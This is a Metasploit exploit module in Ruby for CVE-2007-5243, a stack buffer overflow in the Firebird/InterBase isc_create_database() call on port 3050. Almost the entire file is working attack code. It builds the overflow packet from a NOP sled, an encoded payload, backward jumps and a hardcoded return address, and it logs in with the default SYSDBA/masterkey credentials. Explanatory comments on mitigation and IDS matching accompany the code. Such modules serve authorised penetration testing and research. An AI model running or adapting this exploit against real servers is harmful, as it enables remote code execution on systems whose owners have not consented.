##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
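class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::BruteTargets

  # Module metadata for the Firebird / Borland InterBase isc_create_database()
  # stack buffer overflow (CVE-2007-5243, see References).
  #
  # Targets: index 0 lets BruteTargets iterate over the 'Length' values, index 1
  # (the default) carries the return address for the two Firebird builds named in
  # its label, and index 2 uses a placeholder return address for debugging.
  #
  # @param info [Hash] module info merged by update_info
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Firebird Relational Database isc_create_database() Buffer Overflow',
      'Description' => %q{
          This module exploits a stack buffer overflow in Borland InterBase
        by sending a specially crafted create request.
      },
      'Author' =>
        [
          'Ramon de C Valle',
          'Adriano Lima <adriano[at]risesecurity.org>',
        ],
      'Arch' => ARCH_X86,
      'Platform' => 'win',
      'References' =>
        [
          [ 'CVE', '2007-5243' ],
          [ 'OSVDB', '38606' ],
          [ 'BID', '25917' ],
          [ 'URL', 'http://www.risesecurity.org/advisories/RISE-2007002.txt' ],
        ],
      'Privileged' => true,
      'License' => MSF_LICENSE,
      'Payload' =>
        {
          'Space' => 512,
          'BadChars' => "\x00\x2f\x3a\x40\x5c",
          'StackAdjustment' => -3500,
        },
      'Targets' =>
        [
          [ 'Brute Force', { } ],

          # '\Device\HarddiskVolume1\WINDOWS\system32\unicode.nls'
          [
            'Firebird WI-V2.0.0.12748 WI-V2.0.1.12855 (unicode.nls)',
            { 'Length' => [ 756 ], 'Ret' => 0x00370b0b }
          ],

          # Debug
          [
            'Debug',
            { 'Length' => [ 756 ], 'Ret' => 0xaabbccdd }
          ],
        ],
      'DefaultTarget' => 1,
      'DisclosureDate' => '2007-10-03'
    ))

    # 3050 is the Firebird/InterBase listener port this module connects to.
    register_options(
      [
        Opt::RPORT(3050)
      ])
  end

  # Build the database parameter block (DPB) that accompanies the create request.
  #
  # Layout produced here: a one-byte version tag (isc_dpb_version1), then a
  # (tag, length, bytes) triple for the user name (isc_dpb_user_name) and one for
  # the password (isc_dpb_password). The credentials are the well-known
  # SYSDBA/masterkey defaults, so a server that still accepts them is exposed
  # regardless of the overflow itself; changing them is a mitigation in its own
  # right.
  #
  # @return [String] raw DPB bytes
  def dpb_create
    isc_dpb_user_name = 28
    isc_dpb_password = 29
    isc_dpb_version1 = 1

    user = 'SYSDBA'
    pass = 'masterkey'

    dpb = ''

    dpb << [isc_dpb_version1].pack('c')

    dpb << [isc_dpb_user_name].pack('c')
    dpb << [user.length].pack('c')
    dpb << user

    dpb << [isc_dpb_password].pack('c')
    dpb << [pass.length].pack('c')
    dpb << pass

    dpb
  end

  # Number of zero bytes required to round +length+ up to a multiple of 4, as the
  # wire format pads each variable-length field this way.
  #
  # The default used to be the String '' — calling the method without an
  # argument then raised NoMethodError on String#remainder. An Integer default
  # keeps the signature and makes the no-argument call return 0.
  #
  # @param length [Integer] byte count to pad
  # @return [Integer] 0..3 (0 for non-positive remainders, as before)
  def buf_padding(length = 0)
    remainder = length.remainder(4)
    remainder > 0 ? 4 - remainder : 0
  end

  # Send one op_create request per 'Length' value of the selected target.
  #
  # The request is: 4-byte opcode, 4-byte id, 4-byte declared length, the body
  # (nops, payload, two backward jumps, 2 random bytes, the target return
  # address, +extra_padding+ random bytes), alignment padding, then the DPB with
  # its own 4-byte length prefix and alignment padding. The declared length
  # (length + extra_padding) deliberately exceeds what the server expects for
  # this operation — see the advisory in References — which is the
  # overlong-field condition a protocol-aware IDS rule for port 3050 can match on.
  #
  # @param target [Msf::Module::Target] the target whose 'Length' list and ret
  #   address are used
  # @return [void]
  def exploit_target(target)
    target['Length'].each do |length|
      connect

      # Create database
      op_create = 20

      # Extra padding to trigger the exception
      extra_padding = 1024 * 16

      buf = ''

      # Operation/packet type
      buf << [op_create].pack('N')

      # Id
      buf << [0].pack('N')

      # Length
      buf << [length + extra_padding].pack('N')

      # Nop block (13 = bytes of the two jumps, the 2 random bytes and the
      # 4-byte return address appended after the payload)
      buf << make_nops(length - payload.encoded.length - 13)

      # Payload
      buf << payload.encoded

      # Jump back into the nop block
      buf << "\xe9" + [-516].pack('V')

      # Jump back
      buf << "\xeb" + [-7].pack('c')

      # Random alpha data
      buf << rand_text_alpha(2)

      # Target
      buf << [target.ret].pack('V')

      # Random alpha data
      buf << rand_text_alpha(extra_padding)

      # Padding
      buf << "\x00" * buf_padding(length + extra_padding)

      # Database parameter block
      # Create database parameter block
      dpb = dpb_create

      # Database parameter block length
      buf << [dpb.length].pack('N')

      # Database parameter block
      buf << dpb

      # Padding
      buf << "\x00" * buf_padding(dpb.length)

      sock.put(buf)

      # Kernel#select with no IO sets: a plain 4-second wait before the handler runs
      select(nil,nil,nil,4)

      handler
    end
  end
end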